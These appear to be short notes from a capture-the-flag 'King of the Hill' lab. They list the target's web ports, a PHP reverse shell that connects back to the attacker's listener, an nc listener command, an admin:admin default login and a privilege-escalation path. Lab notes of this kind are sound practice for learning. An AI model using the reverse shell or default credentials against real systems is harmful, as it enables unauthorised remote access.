KoTH H1 easy
Target IP: 10.10.109.211
My local IP: 10.11.12.13
Targets
| server | port | service | version | vulnerable | link |
|---|---|---|---|---|---|
| 1 | 8000 | apache httpd | 2.4.29 | x | http://10.10.109.211:8000/vbcms/login |
| 2 | 8001 | apache httpd | 2.4.29 | x | http://10.10.109.211:8001 |
| 3 | 8002 | apache httpd | 2.4.29 | x | http://10.10.109.211:8002/lesson/1 |
| 4 | 80 | | | | http://10.10.109.211:80/topSecretPrivescMethod |
Server 3
Reverse Shell
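Spawn a remote shell by using remote code execution:

```php
// Connect back to the listener on the local machine
$sock = fsockopen("10.11.12.13", 4444);
// Run an interactive shell with stdin, stdout and stderr attached to the socket
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
```

Listen for the reverse shell on the local machine:

```
nc -lvnp 4444
```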
Privilege escalation
Server 1
robots.txt -> /vbcms/login; log in with credentials admin:admin.
Server 4
path: /topSecretPrivescMethod